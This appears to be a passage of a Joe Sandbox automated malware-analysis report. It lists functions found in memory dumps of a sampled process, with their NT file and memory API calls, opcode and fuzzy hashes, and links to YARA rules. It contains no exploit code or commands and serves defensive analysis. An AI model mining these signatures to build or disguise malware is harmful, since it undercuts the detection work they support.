                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,005074DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,005074DC,?,00000000,00000060,00000000,00000000), ref: 0050C7AD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction ID: b39db305cd208c9c857628e4f8325440b60aa6bed399b33850408e178075f316
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFF07FB2215208AFCB48DF89DC85EEB77EDAF8C754F158248BA0D97241D630F851CBA5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C810 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(005076A0,00502B68,FFFFFFFF,0050718A,00000002,?,005076A0,00000002,0050718A,FFFFFFFF,00502B68,005076A0,00000002,00000000), ref: 0050C855
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction ID: bca039af7086f3e2b8df5b2a66fae8515fe2ee5e5c2e1ff1ac044ab362f31314
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F118648BA0D97241D630E8118BA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C93A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004F17C4,00000004,00001000,00000000), ref: 0050C979
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction ID: d15651606aa4db7bae66c03606dc09d2ec38bf9f551a7e7f081048acaf1d1236
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF034B2200208ABCB18DF98DC45EEB37ADAF88350F118119BA0997252C630E810CFA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C940 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004F17C4,00000004,00001000,00000000), ref: 0050C979
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction ID: 86c7020e49478bf497dbee3287f562b13210107d8c24b32863ac3a8f39ba6da5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF015B2200208ABCB18DF89DC85EEB77ADAF88750F018108BE0997241C630F810CBB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C85A Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtDeleteFile.NTDLL(005074A2,00000002,?,005074A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0050C885
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                                                • Opcode ID: af43bbe0925faea0f5deccc4693ce801073e505d6d2a6a8160379dbb5c0642ec
                                                                                                                                                                                                                                                                                                • Instruction ID: fe97356d21085d612595117eab576f7abf2f6bd7570e1e2052c40d38f492205b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af43bbe0925faea0f5deccc4693ce801073e505d6d2a6a8160379dbb5c0642ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE08CB16003146BD710EF98DC8AECB3BA8EB48710F004465BA1D9B242DA74E5008BE1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C860 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtDeleteFile.NTDLL(005074A2,00000002,?,005074A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0050C885
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                                                                                                                                                                                                • Instruction ID: 0eba043983502c8dee7c4a1b33aaf99e98fbeb05725942320d1da1c4aedf6433
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46D012712402146BD614EB98DC49ED77B6CDF44750F014455BA1D5B241C570F50087E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C890 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(004FE515,00000000,?,004FE515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0050C8B5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                • Instruction ID: ce3b7a946887f4df7eafecaf3e61f1a3499f9647c62bf281ce9c5147786ee1ee
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42D012722002146BD614EB98DC49EDB7B6CDF48660F018455BA1D5B242C570F50086E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050C88B Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtClose.NTDLL(004FE515,00000000,?,004FE515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0050C8B5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                                                                                                                                                                                                                                                • Instruction ID: a287a63eefef264c80b689bef19b2fb873eb0814ad238942760450b8d42659d8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BE08C76200204ABD614EBA4DC49EDB3BA9EF88620F018454BA095B342C170F6008BE1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9b510f668499c9c46a1404e0bd6c38391c3ff14ce4e0ad623f96ca40cde9984b
                                                                                                                                                                                                                                                                                                • Instruction ID: 8acb8571683d0a7ed1d450a952389fff80d46763aae379811ccd30bb69d12a05
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b510f668499c9c46a1404e0bd6c38391c3ff14ce4e0ad623f96ca40cde9984b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A39002B120100912D14071D984047461105A7D0341FD1C011A5454594ECA998DD577A5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 71413fa9a127f8021a20e52313766e97ee148bc7d94c8c8c5adc2828d6b194d2
                                                                                                                                                                                                                                                                                                • Instruction ID: b8f0d693717e04ab84ffc8f59d10442128546b657a20728194e70a35f2fe7966
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71413fa9a127f8021a20e52313766e97ee148bc7d94c8c8c5adc2828d6b194d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D900265211005134105A5D947045071146A7D53913D1C021F1405590CDA6188616261
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 889f59831c380a0dd15fc8430234bf8226764cf8dafa4f3c06058b9afaf2d169
                                                                                                                                                                                                                                                                                                • Instruction ID: eb40477afa98690faed42eb9819dfefbac7cd26cc5792571d2c3671a17f2e617
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 889f59831c380a0dd15fc8430234bf8226764cf8dafa4f3c06058b9afaf2d169
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48900265221005124145A5D9460450B1545B7D63913D1C015F18065D0CCA6188656361
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 010999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f6c543a88a7e3b69cd45bbbf1588bbb0eaf417e766c24fb4d4db4f7350afebf4
                                                                                                                                                                                                                                                                                                • Instruction ID: 943402010ef5da316befbaeb4f8cba97c620dfcd0c07446a32989444130047c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6c543a88a7e3b69cd45bbbf1588bbb0eaf417e766c24fb4d4db4f7350afebf4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E29002A134100952D10061D98414B061105E7E1341FD1C015E1454594DCA59CC527266
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 010995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e1c64880f685cea1635893e07038176fea54a6385ce3b62634fed92a3b7653a1
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ce3cc9070eb3244e6dd013e59b8d02cf4fba5bfe6549c4f618595fcadbe0af4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c64880f685cea1635893e07038176fea54a6385ce3b62634fed92a3b7653a1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B29002A120200513810571D98414616510AA7E0241BD1C021E14045D0DC96588917265
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d20658b7261f37683836df4597b580046dc3ea059f149de10b7a6f9225675bf5
                                                                                                                                                                                                                                                                                                • Instruction ID: b3dee4324e0af550cd8d325a320bdd00a46b2e05bfbef0c43f64552a2415af04
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d20658b7261f37683836df4597b580046dc3ea059f149de10b7a6f9225675bf5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D900261242046629545B1D984045075106B7E02817D1C012A1804990CC9669856E761
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f0519bab75daf4e1ff0f91e507ddac5773def89b543715a974b3634832043ab8
                                                                                                                                                                                                                                                                                                • Instruction ID: e39a60ca623bb4abd20a526d14ef158471281c48d64abb3ccee174302c19e1f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0519bab75daf4e1ff0f91e507ddac5773def89b543715a974b3634832043ab8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F90027120100923D11161D985047071109A7D0281FD1C412A0814598DDA968952B261
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d1efa0e1dad13cae576967b9cb1df07d2e11199191408d185775b618dbf6982
                                                                                                                                                                                                                                                                                                • Instruction ID: 38e287de16e15ea90687ac503cfb24e5a2acc692362dbbe7694b682019bb7a36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d1efa0e1dad13cae576967b9cb1df07d2e11199191408d185775b618dbf6982
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2790027120100912D10065D994086461105A7E0341FD1D011A5414595ECAA588917271
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c5f4a0a9093886a6d2a3c986b725ac5ea940bc8bb708693862ed62a6690ba82f
                                                                                                                                                                                                                                                                                                • Instruction ID: ca79ded156e519af0683b98b52d4a7e5d107208dcdd63ff208b3fa8e0443611b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5f4a0a9093886a6d2a3c986b725ac5ea940bc8bb708693862ed62a6690ba82f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A90026921300512D18071D9940860A1105A7D1242FD1D415A0405598CCD5588696361
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

